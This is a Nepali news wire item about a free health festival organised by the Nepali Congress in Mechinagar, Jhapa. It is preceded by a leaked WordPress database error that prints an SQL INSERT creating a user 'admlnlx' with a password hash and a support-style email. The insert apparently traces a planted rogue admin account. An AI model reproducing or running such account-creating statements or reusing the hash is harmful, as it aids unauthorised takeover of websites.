WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJd4X6EXijeUzgkdSDLfLw5RXgxKyR0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 00:53:25', '', 'admlnlx', 'admlnlx')
काँकडभिट्टा (झापा), माघ ८ –
प्रथम स्वास्थ्य महोत्सव आजबाट झापाको मेचीनगरमा सुरु भएको छ ।
नेपाली काँग्रेसको आयोजनामा सुरु भएको महोत्सव माघ १४ गतेसम्म सञ्चालन हुने छन् । महोत्सवमा २५ हजारलाई निःशुल्क उपचार सेवा पु¥याउने लक्ष्य आयोजकले लिएको छ ।
राष्ट्रिय धुन बजाएर उद्घाटन गरिएको सो महोत्सवको पहिलो दिन आज ज्येष्ठ नागरिकका लागि विशेष उपचार सेवा प्रदान गरिने भएकाले स्वास्थ्योपचारका लागि सयौँको सङ्ख्यामा ज्येष्ठ नागरिक बिहानैदेखि लामवद्ध भएर उभिएका छन् ।
काठमाडौँ, पोखरा, विराटनगर, धरान, भद्रपुर, विर्तामोड र मेचीनगरका २५ वटा अस्पतालबाट आएका विशेषज्ञ चिकित्सकसहितको टोलीले महोत्सवमा निःशुल्क उपचार सेवा प्रदान गर्ने नेपाली काँग्रेसका केन्द्रीय सदस्य विश्वप्रकाश शर्माले जानकारी दिनुभयो ।
महोत्सवमा ‘रोग अनुभव र अनुभूति’ विषयक छलफल कार्यक्रम समेत आयोजना गर्ने भएको छ । महोत्सवस्थलमा सेवाग्राहीको बढेको भीडलाई व्यवस्थापन गर्न स्वयम्सेवकको रुपमा तरुण दलका कार्यकर्तालाई परिचालन गरेका छन् भने त्यसमा नेपाल प्रहरी र सशस्त्र प्रहरी पनि सघाएका छन् । – रासस